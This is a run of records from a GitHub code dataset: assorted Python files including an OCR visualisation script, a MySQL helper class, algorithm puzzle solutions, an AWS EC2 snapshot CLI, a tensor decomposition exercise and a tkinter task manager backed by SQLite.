DatasetCatalog.DATASETS[cfg.DATASETS.TEST[0]][0])\n\n img = cv2.imread(os.path.join(img_dir, key.replace('res', 'gt')+'.jpg'))\n gt_img = img.copy()\n for rect in bbox_results[key]:\n if rect['confidence'] > conf_thresh:\n pred_pts = rect['points']\n img = cv2.polylines(img, [np.array(pred_pts).astype(np.int32)], True, (0, 255, 0), 3)\n\n for poly in output_results[key]:\n pred_pts = poly['points']\n img = cv2.polylines(img, [np.array(pred_pts).astype(np.int32)], True, (0, 0, 255), 2)\n\n for rect in bbox_results[key]:\n if rect['confidence'] > conf_thresh:\n pred_pts = rect['points']\n img = cv2.putText(img, '{:.4f}'.format(rect['confidence']), (pred_pts[0][0], pred_pts[0][1]),\n cv2.FONT_HERSHEY_SIMPLEX, 0.6, (0, 0, 0), 2, cv2.LINE_AA)\n img = cv2.putText(img, '{:.4f}'.format(rect['confidence']), (pred_pts[0][0], pred_pts[0][1]),\n cv2.FONT_HERSHEY_SIMPLEX, 0.6, (255, 255, 255), 1, cv2.LINE_AA)\n\n for gt_poly in gt_results[key.replace('res', 'gt')]['polygons']:\n gt_pts = gt_poly['points']\n if gt_poly['illegibility']:\n gt_img = cv2.polylines(gt_img, [np.array(gt_pts).astype(np.int32)], True, (0, 255, 0), 2)\n else:\n gt_img = cv2.polylines(gt_img, [np.array(gt_pts).astype(np.int32)], True, (0, 0, 255), 2)\n\n img_show = np.concatenate([img, gt_img], axis=1)\n cv2.imwrite(os.path.join(cfg.VIS_DIR, key.replace('res', 'gt')+'.jpg'), img_show)\n\n with tempfile.NamedTemporaryFile() as f:\n file_path = f.name\n if output_folder:\n file_path = os.path.join(output_folder, \"result.json\")\n bbox_file_path = os.path.join(output_folder, \"bbox_result.json\")\n with open(file_path, \"w\") as json_f:\n json.dump(output_results, json_f)\n with open(bbox_file_path, \"w\") as json_ff:\n json.dump(bbox_results, json_ff)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"FudanOCR/FudanOCR","sub_path":"model/detection_model/maskscoring_rcnn/test_net.py","file_name":"test_net.py","file_ext":"py","file_size_in_byte":6645,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"72682669289","text":"import journal.TaskConfig as TC\n\n# import mysql.connector\nfrom impala.util import as_pandas\nimport numpy as np\nimport pyodbc\nimport os\n\n\nclass MySQLConnection():\n\n\n def __init__(self, settings = TC.mysql_connection_settings):\n\n if os.name == 'posix':\n driver_name = 'Devart ODBC Driver for MySQL'\n else:\n driver_name = 'MySQL ODBC 8.0 ANSI Driver'\n\n self.conn = pyodbc.connect('''\n DRIVER={'''+driver_name+'''};\n Server=''' + settings['host'] + ''';\n User='''+settings['username']+''';\n Password=''' + settings['password'] + ''';\n OPTION=3\n ''')\n\n self.cur = self.conn.cursor()\n\n def execute(self, query, n=10):\n\n for i in range(n):\n try:\n self.cur.execute(query)\n except Exception:\n if i == (n-1):\n print(\"Query execution error\")\n pass\n else:\n break\n\n def _getTypeDataSet(self, df):\n impala_types = []\n for name, dtype in zip(df.columns, df.dtypes):\n if \"bool\" in str(dtype):\n impala_types.append('BOOLEAN')\n elif \"float\" in str(dtype):\n impala_types.append('BIGINT')\n elif \"int\" in str(dtype):\n impala_types.append('BIGINT')\n elif \"datetime64\" in str(dtype):\n impala_types.append('TIMESTAMP')\n else:\n impala_types.append('VARCHAR(100)')\n return impala_types\n\n def _createTable(self, df, table, print_q=False):\n\n self.execute('drop table if exists ' + table)\n columns = ', '.join([name + ' ' + impala_type for name, impala_type in zip(df.columns, self._getTypeDataSet(df))])\n query = \"\"\"\n CREATE 
TABLE \"\"\" + table + \"\"\" (\"\"\" + columns + \"\"\") ENGINE=MyISAM AUTO_INCREMENT=1 DEFAULT CHARSET=utf8 ;\n \"\"\"\n\n if print_q: print(query)\n self.execute(query)\n\n def loadTableIntoMySQL(self, df, table, partition='', replace=True, print_q=False):\n\n def transform_element(el):\n if el is None:\n el = 'NULL'\n elif isinstance(el, (bool, int, float, np.int64, np.int32, np.int16, np.int)):\n if np.isnan(el):\n el = 'NULL'\n else:\n el = str(el)\n else:\n el = \"'\" + str(el).replace(\"'\", \"\") + \"'\"\n return el\n\n if replace:\n self._createTable(df, table, print_q=print_q)\n\n\n columns = \",\".join(df.columns)\n\n values = \",\".join([\"(\" + \",\".join([transform_element(el) for el in r[1].values]) + \")\" for r in df.iterrows()])\n\n query = \"\"\"INSERT INTO \"\"\" + table + \"\"\" (\"\"\" + columns + \"\"\") \"\"\" + partition + \"\"\" values \"\"\" + values\n\n if print_q: print(query)\n\n self.execute(query)\n\n\ndef main():\n # Loading data from MySQL as an example\n conn = MySQLConnection()\n # in the query below table_name has to be replaced to some existing table\n query = '''\n select * from table_name limit 10\n '''\n conn.execute(query)\n\n res = as_pandas(conn.cur)\n print(res.head())\n\n res.loc[res.shape[0]] = [None, 'TEST']\n\n print('Table is loaded')\n\n # Loading Table into MySQL (another scheme)\n # in the query below schema_name has to be replaced to some existing schema\n conn.loadTableIntoMySQL(res, table='schema_name.test_table', replace=True, print_q=False)\n\n # Deleting created table\n conn.execute('drop table if exists schema_name.test_table')\n\n print('Done')\n\nif __name__ == '__main__':\n\n main()\n\n","repo_name":"Aziko13/DB_classes","sub_path":"MySQLFunctions.py","file_name":"MySQLFunctions.py","file_ext":"py","file_size_in_byte":3819,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"38796639262","text":"class Solution:\n def floodFill(self, image, sr: int, sc: int, newColor: int):\n m = len(image)\n n = len(image[0])\n z = image[sr][sc]\n if z == newColor:\n return image\n ready = list()\n ready.append((sr, sc))\n image[sr][sc] = newColor\n while ready:\n (i1, j1) = ready.pop(0)\n for (i, j) in [(-1, 0), (1, 0), (0, -1), (0, 1)]:\n x = i1 + i\n y = j1 + j\n if 0 <= x < m and 0 <= y < n and image[x][y] == z:\n image[x][y] = newColor\n ready.append((x, y))\n return image\n","repo_name":"saycmily/vtk-and-python","sub_path":"leecode/501-1000/601-1000/733-图像渲染.py","file_name":"733-图像渲染.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15249345076","text":"#!/usr/bin/python3\n\nimport re\nimport sys\n\nlines = []\nfor line in sys.stdin:\n lines.append(line)\n\nfor line in lines:\n line = re.sub(r'\\n$', '', line)\n words = re.split(r'\\s+', line)\n\n for word in words:\n counter = {}\n for char in word:\n char = char.lower() \n \n if char in counter:\n counter[char] += 1\n else:\n counter[char] = 1\n\n times = -1\n equi = True\n\n for char in counter.keys():\n if times == -1:\n times = counter[char]\n else:\n if times != counter[char]:\n equi = False\n break\n \n if equi:\n sys.stdout.write(word)\n sys.stdout.write(' ')\n\n sys.stdout.write('\\n')\n","repo_name":"z3r0sw0rd/COMP2041","sub_path":"test10/equi_filter.py","file_name":"equi_filter.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} 
+{"seq_id":"22623920831","text":"import sys\nimport boto3\nimport botocore\nimport os\nimport click\n\n#If .aws credentials file is in non standard location (~/.aws/credentials) uncomment and provide path\n# os.environ['AWS_SHARED_CREDENTIALS_FILE'] = '/home/ec2-user/environment/acg_py_code/.aws/credentials' \n\nsession = boto3.Session()\nec2 = session.resource('ec2')\n\n# Generic helper fxns\ndef filter_instances(project):\n instances = []\n \n if project:\n print(project)\n filters = [{'Name': 'tag:Name', 'Values': [project]}]\n instances = ec2.instances.filter(Filters=filters)\n else:\n instances = ec2.instances.all()\n \n return instances\n \n\ndef has_pending_snapshot(volume):\n snapshots = list(volume.snapshots.all())\n return snapshots and snapshots[0].state == 'pending'\n\n \n# Fxns for CLI cmd args \n@click.group()\ndef cli():\n \"\"\"Manages instances and volumes\"\"\"\n\n# Snapshots management\n@cli.group('snapshots')\ndef snapshots():\n \"\"\"Commands for snapshots\"\"\"\n \n@snapshots.command('list') \n@click.option('--project', default=None, help=\"Only snapshots for project tag Name \")\ndef list_snapshots(project):\n \"List EC2 volume snapshots\"\n \n instances = filter_instances(project)\n for i in instances:\n for v in i.volumes.all():\n for s in v.snapshots.all():\n print(', '.join((v.id, i.id, s.id, s.description, s.state)))\n \n # only show most recent successful snapshot\n if s.state == 'completed': break\n\n return\n \n\n# Volumes management\n@cli.group('volumes')\ndef volumes():\n \"\"\"Commands for volumes\"\"\"\n \n@volumes.command('list') \n@click.option('--project', default=None, help=\"Only volumes for project tag Name \")\ndef list_volumes(project):\n \"List EC2 volumes\"\n \n instances = filter_instances(project)\n for i in instances:\n for v in i.volumes.all():\n print(', '.join((v.id, v.state, i.id, str(v.size))))\n\n return\n\n\n\n# Instances management\n@cli.group('instances')\ndef instances():\n \"\"\"Commands for instances\"\"\"\n\n\n@instances.command('list') \n@click.option('--project', default=None, help=\"Only instances for project tag Name \")\ndef list_instances(project):\n \"List EC2 instances\"\n \n instances = filter_instances(project)\n \n for i in instances:\n tags = { t['Key']: t['Value'] for t in i.tags or [] }\n print (', '.join((i.id, i.instance_type, i.placement['AvailabilityZone'], i.state['Name'], i.public_dns_name, str(i.public_ip_address), tags.get('Name', ''))))\n\n\n@instances.command('snapshot') \n@click.option('--project', default=None, help=\"Only instances for project tag Name \")\ndef create_snapshot_instances(project):\n \"Snapshot of EC2 instance volumes\"\n \n instances = filter_instances(project)\n \n for i in instances:\n \n # first stop instances before doing snapshot\n print(\"Stopping instance {0}\".format(i.id))\n i.stop()\n i.wait_until_stopped()\n \n for v in i.volumes.all():\n if has_pending_snapshot(v):\n print (\"Cant do snapshot presently...{0}\".format(v.id))\n \n print (\"Creating snapshot of {0}\".format(v.id))\n v.create_snapshot(Description=\"Snapshot created by ec2_aws.py\")\n \n # start instances post snapshot\n print(\"Restarting instance {0}\".format(i.id))\n i.start()\n i.wait_until_running()\n \n print(\"Snapshots complete\")\n \n return\n\n\n@instances.command('stop')\n@click.option('--project', default=None, help=\"Only instances for project tag Name \")\ndef stop_instances(project):\n \"Stop EC2 instances\"\n \n instances = filter_instances(project)\n \n for i in instances:\n print 
(\"Stopping...{0}\".format(i.id))\n try:\n i.stop()\n except botocore.exceptions.ClientError as e:\n print(\"Could not stop {0}. \".format(i.id) + str(e))\n \n return\n\n\n@instances.command('start')\n@click.option('--project', default=None, help=\"Only instances for project tag Name \")\ndef start_instances(project):\n \"Start EC2 instances\"\n \n instances = filter_instances(project)\n \n for i in instances:\n print (\"Starting...{0}\".format(i.id))\n try:\n i.start()\n except botocore.exceptions.ClientError as e:\n print(\"Could not start {0}. \".format(i.id) + str(e))\n \n return\n\n\n\n#session = boto3.Session(profile_name='shotty')\nif __name__ == '__main__':\n cli()\n\n \n ","repo_name":"alancam73/py-ec2-aws","sub_path":"shotty/ec2_aws.py","file_name":"ec2_aws.py","file_ext":"py","file_size_in_byte":4557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23279839733","text":"import os\n\nSPOTIFY_AUTH_URL = \"https://accounts.spotify.com/authorize\"\nSPOTIFY_TOKEN_URL = \"https://accounts.spotify.com/api/token\"\nSPOTIFY_API_URL = \"https://api.spotify.com/v1\"\nREDIRECT_URI = \"http://127.0.0.1:5000/callback/\"\nSCOPE = \"user-top-read user-read-currently-playing\"\nCLIENT_ID = 'Enter Client ID'\nCLIENT_SECRET = 'Enter Secret ID'\nAUTH_QUERY_PARAMETERS = {\n \"response_type\": \"code\",\n \"redirect_uri\": REDIRECT_URI,\n \"scope\": SCOPE,\n \"client_id\": CLIENT_ID,\n}","repo_name":"wesngu28/searchify-flask","sub_path":"spotifyinfo/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"34253245443","text":"\"\"\"\nEscape Pods\n===========\n\nYou've blown up the LAMBCHOP doomsday device and broken the bunnies out of Lambda's prison - and now you need to escape from the space station as quickly and as orderly as possible! The bunnies have all gathered in various locations throughout the station, and need to make their way towards the seemingly endless amount of escape pods positioned in other parts of the station. You need to get the numerous bunnies through the various rooms to the escape pods. Unfortunately, the corridors between the rooms can only fit so many bunnies at a time. What's more, many of the corridors were resized to accommodate the LAMBCHOP, so they vary in how many bunnies can move through them at a time.\n\nGiven the starting room numbers of the groups of bunnies, the room numbers of the escape pods, and how many bunnies can fit through at a time in each direction of every corridor in between, figure out how many bunnies can safely make it to the escape pods at a time at peak.\n\nWrite a function solution(entrances, exits, path) that takes an array of integers denoting where the groups of gathered bunnies are, an array of integers denoting where the escape pods are located, and an array of an array of integers of the corridors, returning the total number of bunnies that can get through at each time step as an int. The entrances and exits are disjoint and thus will never overlap. The path element path[A][B] = C describes that the corridor going from A to B can fit C bunnies at each time step. 
There are at most 50 rooms connected by the corridors and at most 2000000 bunnies that will fit at a time.\n\nFor example, if you have:\nentrances = [0, 1]\nexits = [4, 5]\npath = [\n [0, 0, 4, 6, 0, 0], # Room 0: Bunnies\n [0, 0, 5, 2, 0, 0], # Room 1: Bunnies\n [0, 0, 0, 0, 4, 4], # Room 2: Intermediate room\n [0, 0, 0, 0, 6, 6], # Room 3: Intermediate room\n [0, 0, 0, 0, 0, 0], # Room 4: Escape pods\n [0, 0, 0, 0, 0, 0], # Room 5: Escape pods\n]\n\nThen in each time step, the following might happen:\n0 sends 4/4 bunnies to 2 and 6/6 bunnies to 3\n1 sends 4/5 bunnies to 2 and 2/2 bunnies to 3\n2 sends 4/4 bunnies to 4 and 4/4 bunnies to 5\n3 sends 4/6 bunnies to 4 and 4/6 bunnies to 5\n\nSo, in total, 16 bunnies could make it to the escape pods at 4 and 5 at each time step. (Note that in this example, room 3 could have sent any variation of 8 bunnies to 4 and 5, such as 2/6\nand 6/6, but the final solution remains the same.)\n\nTest cases\n==========\nYour code should pass the following test cases.\nNote that it may also be run against hidden test cases not shown here.\n\n-- Python cases --\nInput:\nsolution.solution([0], [3], [[0, 7, 0, 0], [0, 0, 6, 0], [0, 0, 0, 8], [9, 0, 0, 0]])\nOutput:\n 6\n\nInput:\nsolution.solution([0, 1], [4, 5], [[0, 0, 4, 6, 0, 0], [0, 0, 5, 2, 0, 0], [0, 0, 0, 0, 4, 4], [0, 0, 0, 0, 6, 6], [0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0]])\nOutput:\n 16\n\"\"\"\ndef solution(entrances, exits, paths):\n \"\"\"\n \"\"\"\n total_flow = 0\n remaining = paths[:]\n\n prev_flow = -1\n\n while prev_flow != total_flow:\n prev_flow = total_flow\n\n for j in entrances:\n node = j\n visited = []\n path = []\n while True:\n # if node is an exit find the bottleneck flow through the path and update the remaining capacity\n if node in exits:\n path.append(node)\n bottleneck = 2000001\n for ind in range(len(path)-1):\n bottleneck = min(remaining[path[ind]][path[ind+1]], bottleneck)\n total_flow += bottleneck\n for ind in range(len(path)-1):\n remaining[path[ind]][path[ind+1]] -= bottleneck\n remaining[path[ind+1]][path[ind]] += bottleneck\n break\n\n found = False\n visited.append(node)\n # let's get greedy\n maximum = 0\n index = 0\n for ind, val in enumerate(remaining[node]):\n if ind not in visited and val>maximum:\n maximum = val\n index = ind\n found = True\n\n # if theres an unvisited neighbour, append path with current node and set the next node to expore\n if found:\n path.append(node)\n node = index\n # else, if theres no unexplored neighbour and the path is empty then there is no path from this source\n elif not path:\n break\n # else, backtrack\n else:\n node = path.pop()\n\n return total_flow\n","repo_name":"Shiakaron/foo.bar","sub_path":"level4_part2.py","file_name":"level4_part2.py","file_ext":"py","file_size_in_byte":4735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41624219304","text":"from data_prueba import lista_bzrp\n\ndef generar_csv(nombre_archivo : str, lista : list[dict]):\n '''\n Genera un archivo csv a partir de una lista de ddionarios\n Recibe: el path/nombre_archivo.csv. 
(Donde se va a guardar)\n Devuelve: no aplica\n '''\n with open(nombre_archivo, \"w\") as archivo: # \"w\" es ecritura\n for video in lista:\n # print(video)\n texto_mensaje = \"{0},{1}\\n\".format(video[\"title\"], video[\"views\"]) #hay que darle separacion con coma y al final salto de linea \\n (alt +92 n)\n archivo.write(texto_mensaje)\n\npath_archivo = \"9-Ejercicios-Trabajar_con_archivos_json_y_csv -GUIA-f\\mi_data_prueba.csv\"\ngenerar_csv(path_archivo, lista_bzrp)","repo_name":"HoracioxBarrios/programacion_1_python","sub_path":"9-Ejercicios-Trabajar_con_archivos_json_y_csv -GUIA-f/3_generar_csv_desde_una_list_dicc.py","file_name":"3_generar_csv_desde_una_list_dicc.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"33773182664","text":"import heapq\n\ndef solution(n, works):\n answer = 0\n \n # 최대 힙으로 변환\n works = [-work for work in works]\n heapq.heapify(works)\n \n # N시간 동안 야근을 하면서 작업량을 최소화\n for _ in range(n):\n if works:\n max_work = -heapq.heappop(works) # 가장 많은 작업량을 가진 작업을 꺼냄\n if max_work > 1:\n heapq.heappush(works, -(max_work - 1)) # 작업량을 1 줄인 후 다시 힙에 추가\n \n # 야근 피로도 계산\n for work in works:\n answer += work ** 2\n \n return answer","repo_name":"fkstndnjs/CodingTest","sub_path":"lv3/ex15.py","file_name":"ex15.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70518343529","text":"import torch \nfrom torch import nn\nimport numpy as np\nimport scipy.sparse as sp\nfrom sklearn.metrics.pairwise import cosine_similarity\ndef graph_generator(features):\n # features=features.cpu().detach().numpy()\n thea=0.4\n batch,r,c=features.shape\n adj=torch.zeros((batch,r,r))\n cosine=np.zeros((r,r))\n for i in range(batch):\n adj_batch=cosine_similarity(features[i,:,:])\n adj_mean=np.mean(adj_batch,axis=0)\n adj_mean_m=np.repeat(adj_mean,r,axis=0).reshape((r,r))\n for m in range(r):\n for n in range(r):\n if adj_batch[m][n]>=adj_mean_m[m][n]:\n cosine[m][n]=1\n elif thea float:\n '''\n compute_mse():\n Computes the Mean Squared Error (MSE) between the original and recomposed tensors.\n\n Args:\n original (np.ndarray): The original tensor.\n recomposed (np.ndarray): The recomposed tensor.\n\n Returns:\n float: The MSE between the original and recomposed tensors.\n '''\n mse = np.mean((original - recomposed) ** 2)\n return mse\n\ndef part3() -> tuple[str, str]:\n _x11 = np.array([\n [4, 2, 6],\n [5, 2, 9],\n [6, 7, 2]\n ])\n\n _x12 = np.array([\n [4, 5, 8],\n [7, 3, 6],\n [2, 4, 9]\n ])\n\n _x21 = np.array([\n [4, 3, 6],\n [8, 4, 1],\n [4, 2, 9]\n ])\n\n _x22 = np.array([\n [5, 1, 8],\n [8, 3, 6],\n [3, 5, 1]\n ])\n\n _x31 = np.array([\n [6, 3, 8],\n [0, 4, 5],\n [3, 2, 7]\n ])\n\n _x32 = np.array([\n [9, 3, 5],\n [7, 2, 0],\n [4, 2, 9]\n ])\n\n tensor = np.array([\n [_x11, _x12],\n [_x21, _x22],\n [_x31, _x32]\n ])\n\n # Tucker\n tucker_core, tucker_factors = tucker(\n tensor,\n rank = [2, 2, 2, 2]\n )\n\n tucker_tensor_recomposition = tucker_to_tensor(\n tucker_tensor = (\n tucker_core,\n tucker_factors\n )\n )\n\n tucker_mse = compute_mse(tensor, tucker_tensor_recomposition)\n\n mean_square_error_tucker_text = fr'The mean-square error for Tucker decomposition is: {tucker_mse}.'\n\n # CP\n parafac_factors = parafac(tensor, rank = 2)\n\n parafac_tensor_recomposition = kruskal_to_tensor(parafac_factors)\n parafac_mse = compute_mse(tensor, parafac_tensor_recomposition)\n\n 
mean_square_error_cp_text = fr'The mean-square error for CP decomposition is: {parafac_mse}'\n\n    return (mean_square_error_tucker_text, mean_square_error_cp_text)","repo_name":"Delpen9/tensor-analysis-experiments","sub_path":"problem1/part3.py","file_name":"part3.py","file_ext":"py","file_size_in_byte":2084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19175765852","text":"import unittest\n\nfrom lbry.wallet.bcd_data_stream import BCDataStream\n\n\nclass TestBCDataStream(unittest.TestCase):\n\n    def test_write_read(self):\n        s = BCDataStream()\n        s.write_string(b'a'*252)\n        s.write_string(b'b'*254)\n        s.write_string(b'c'*(0xFFFF + 1))\n        # s.write_string(b'd'*(0xFFFFFFFF + 1))\n        s.write_boolean(True)\n        s.write_boolean(False)\n        s.reset()\n\n        self.assertEqual(s.read_string(), b'a'*252)\n        self.assertEqual(s.read_string(), b'b'*254)\n        self.assertEqual(s.read_string(), b'c'*(0xFFFF + 1))\n        # self.assertEqual(s.read_string(), b'd'*(0xFFFFFFFF + 1))\n        self.assertTrue(s.read_boolean())\n        self.assertFalse(s.read_boolean())\n","repo_name":"lbryio/lbry-sdk","sub_path":"tests/unit/wallet/test_bcd_data_stream.py","file_name":"test_bcd_data_stream.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","stars":7218,"dataset":"github-code","pt":"53"} +{"seq_id":"2158051091","text":"# Header\n\n\n\"\"\"\nWeek 2 Review - Part 2\nWyatt Castaneda\nSWDV 600: INTRO TO PROGRAMMING\n\"\"\"\n\n# Problem \n\n\"\"\"\nA franchise restaurant is attempting to understand if customers think their service is good day-to-day by summarizing a series of daily scores. The restaurant computes a daily score based on the number of positive comments and negative comments it receives that day. Each day the score begins at 0. A positive comment adds 1 to the score, and a negative comment subtracts 1. So on a given day if there were 5 positive comments and 2 negative comments, the score for that day would be 3 (5 - 2).\n\nYour task is to write a program that enables a restaurant manager to input these daily scores and report the total score for those days. For example, if the score on Monday is 3, Tuesday is 4, Wednesday is -2, and Thursday is 3, then the total score for those days would be 3 + 4 + (-2) + 3, which is 8. This would indicate the service is being positively reviewed over the past few days.\n\nYour program should prompt the user for how many days of scores they will be entering, and then prompt them for the score for each day. The score prompt should include the number of the day for which they are entering a score (i.e., notice the `day 1` phrase in the prompt of the example below).\n\nOnce all the scores have been entered, it should then output the total score for those days. \n\"\"\"\n\n# Given \n\n\"\"\"\nHow many days of scores? 4\nEnter score for day 1: 2\nEnter score for day 2: 4\nEnter score for day 3: -2\nEnter score for day 4: 1\nThe total score of the 4 days is 5\n\"\"\"\n\n# Solution\n\nimport math\n\nprint()\ninputNumDays = int(input("How many days of scores would you like to enter? 
\"))\nprint()\n\ndef promptUserToEnterDailyScores(numberOfDays):\n result = 0\n\n for day in range(numberOfDays):\n result = result + int(input(f'Enter the score for day {day + 1}: '))\n \n return result\n\nfinalScore = promptUserToEnterDailyScores(inputNumDays)\n\nprint()\nprint(f'The total score of the {inputNumDays} days is {finalScore}.')\n","repo_name":"WyattCast44/intro-to-programming","sub_path":"week-2/total_service_score.py","file_name":"total_service_score.py","file_ext":"py","file_size_in_byte":2024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36453571249","text":"import sqlite3\r\nimport tkinter as tk\r\nfrom tkinter import ttk\r\nfrom tkinter import messagebox\r\nfrom tkcalendar import Calendar\r\nimport datetime\r\n\r\n\r\nchosen_date = None\r\nchosen_deadline = None\r\n\r\ndef delegated_tasks_list():\r\n conn = sqlite3.connect('delegated_tasks.db')\r\n cursor = conn.cursor()\r\n\r\n delegated_tasks_list_win = tk.Tk()\r\n delegated_tasks_list_win.geometry('1000x400')\r\n delegated_tasks_list_win.title('Time Management System 1.1.: DELEGATED TASKS DATABASE')\r\n delegated_tasks_list_win.option_add('*Dialog.msg.title.bg', '#000000')\r\n\r\n canvas = tk.Canvas(delegated_tasks_list_win)\r\n canvas.pack(side='left', fill='both', expand=True)\r\n\r\n scrollbar = ttk.Scrollbar(delegated_tasks_list_win, orient='vertical', command=canvas.yview)\r\n scrollbar.pack(side='right', fill='y')\r\n\r\n canvas.configure(yscrollcommand=scrollbar.set)\r\n canvas.bind('', lambda e: canvas.configure(scrollregion=canvas.bbox('all')))\r\n\r\n frame = tk.Frame(canvas)\r\n canvas.create_window((0, 0), window=frame, anchor='nw')\r\n\r\n treeview = ttk.Treeview(frame, columns=('Task ID', 'Task', 'Keywords', 'Expected Result', 'Date', 'Deadline', 'Delegated to', 'Cooperating with'))\r\n\r\n treeview.heading('#0', text='ID')\r\n treeview.column('#0', width=0, stretch = False)\r\n treeview.heading('Task ID', text='Task ID')\r\n treeview.column('Task ID', width=100)\r\n treeview.heading('Task', text='Task')\r\n treeview.column('Task', width=200)\r\n treeview.heading('Keywords', text='Keywords')\r\n treeview.column('Keywords', width=100)\r\n treeview.heading('Expected Result', text='Expected Result')\r\n treeview.column('Expected Result', width=200)\r\n treeview.heading('Date', text='Date')\r\n treeview.column('Date', width=100)\r\n treeview.heading('Deadline', text='Deadline')\r\n treeview.column('Deadline', width=100)\r\n treeview.heading('Delegated to', text='Delegated to')\r\n treeview.column('Delegated to', width=120)\r\n treeview.heading('Cooperating with', text='Cooperating with')\r\n treeview.column('Cooperating with', width=120)\r\n\r\n cursor.execute('SELECT * FROM delegated_tasks')\r\n for row in cursor.fetchall():\r\n treeview.insert('', 'end', text=row[0], values=row[1:])\r\n\r\n treeview.pack(fill='both', expand=True)\r\n\r\n def compare_dates(item1, item2):\r\n date1 = datetime.datetime.strptime(treeview.item(item1)['values'][0], \"%d/%m/%Y\")\r\n date2 = datetime.datetime.strptime(treeview.item(item2)['values'][0], \"%d/%m/%Y\")\r\n if date1 < date2:\r\n return -1\r\n elif date1 == date2:\r\n return 0\r\n else:\r\n return 1\r\n\r\n\r\n def see_task_in_tasks_list():\r\n global chosen_date\r\n global chosen_deadline\r\n\r\n selection = treeview.selection()\r\n if selection:\r\n pass\r\n else:\r\n messagebox.showerror(\"Error\", \"No task selected. 
Please select a task to see its details.\")\r\n return\r\n\r\n see_task_win = tk.Toplevel()\r\n see_task_win.geometry (\"600x400\")\r\n see_task_win.title(\"TASK VIEW\")\r\n see_task_win.resizable(0,0)\r\n see_task_win.configure(bg = \"#212121\")\r\n \r\n cal = Calendar (see_task_win, selectmode = 'day', date_pattern = ('dd/mm/yyyy'), background = \"black\")\r\n cal.place(x= 330, y= 160)\r\n\r\n def choose_date():\r\n global chosen_date\r\n\r\n chosen_date = cal.get_date()\r\n chosen_date_label = tk.Label(\r\n middle_frame,\r\n text = chosen_date,\r\n font = ('Montserrat', '12'),\r\n background = \"#2F3030\",\r\n foreground = \"#FFFFFF\"\r\n )\r\n chosen_date_label.place(x = 180, y = 5)\r\n \r\n def choose_deadline():\r\n global chosen_deadline\r\n\r\n chosen_deadline = cal.get_date()\r\n chosen_deadline_label = tk.Label(\r\n middle_frame,\r\n text = chosen_deadline,\r\n font = ('Montserrat', '12', 'bold'),\r\n background = \"#970000\",\r\n foreground = \"#FFFFFF\"\r\n )\r\n chosen_deadline_label.place(x = 180, y = 45)\r\n \r\n def exit_see_task():\r\n if len(task_description_row.get()) != 0:\r\n answer = messagebox.askyesno(\"Close\", \"All changes will be lost. Continue?\")\r\n if answer:\r\n see_task_win.destroy()\r\n else: \r\n pass\r\n elif len(keywords_row.get()) != 0:\r\n answer = messagebox.askyesno(\"Close\", \"All changes will be lost. Continue?\")\r\n if answer:\r\n see_task_win.destroy()\r\n else:\r\n pass\r\n elif len(expected_result_row.get()) != 0:\r\n answer = messagebox.askyesno(\"Close\", \"All changes will be lost. Continue?\")\r\n if answer:\r\n see_task_win.destroy()\r\n else:\r\n pass\r\n else:\r\n see_task_win.destroy()\r\n\r\n def edit_task():\r\n global chosen_date\r\n global chosen_deadline\r\n\r\n selection = treeview.selection()[0]\r\n if selection:\r\n task_name = treeview.item(selection, 'values')[1]\r\n else:\r\n messagebox.showerror(\"Error\", \"No task selected. 
Please select a task to see its details.\")\r\n \r\n if chosen_date is None and chosen_deadline is not None:\r\n chosen_date = chosen_deadline\r\n elif chosen_date is not None and chosen_deadline is not None:\r\n chosen_date = min(chosen_date, chosen_deadline)\r\n elif chosen_date is not None and chosen_deadline is None:\r\n chosen_deadline = chosen_date\r\n \r\n answer = messagebox.askyesno(\"Edit Task\", \"Do you wish to edit task?\")\r\n if answer:\r\n try:\r\n if len(delegate_to_row.get()) != 0:\r\n conn = sqlite3.connect('delegated_tasks.db')\r\n cursor = conn.cursor()\r\n cursor.execute(f\"SELECT id FROM delegated_tasks WHERE task_or_action = '{task_name}'\")\r\n row = cursor.fetchone()\r\n row_id = row[0]\r\n cursor.execute(\"DELETE FROM delegated_tasks WHERE id = ?\", (row_id,))\r\n conn.commit()\r\n treeview.delete(treeview.selection())\r\n\r\n task_ID = None\r\n task_or_action = task_description_row.get()\r\n keywords = keywords_row.get()\r\n expected_result = expected_result_row.get()\r\n date = chosen_date\r\n deadline = chosen_deadline\r\n delegate_to = delegate_to_row.get()\r\n cooperate_with = cooperate_with_row.get()\r\n\r\n query = \"INSERT INTO delegated_tasks (task_ID, task_or_action, keywords, expected_result, date, deadline, delegate_to, cooperate_with) VALUES (?, ?, ?, ?, ?, ?, ?, ?)\"\r\n values = (task_ID, task_or_action, keywords, expected_result, date, deadline, delegate_to, cooperate_with)\r\n cursor.execute(query, values)\r\n\r\n conn.commit()\r\n messagebox.showinfo(\"Success\", \"Task successfully edited!\")\r\n cursor.close()\r\n conn.close()\r\n messagebox.showinfo(\"Success\", \"Task successfully edited!\")\r\n else:\r\n tasks_conn = sqlite3.connect('tasks.db')\r\n tasks_cursor = tasks_conn.cursor()\r\n delegated_conn = sqlite3.connect('delegated_tasks.db')\r\n delegated_cursor = delegated_conn.cursor()\r\n \r\n 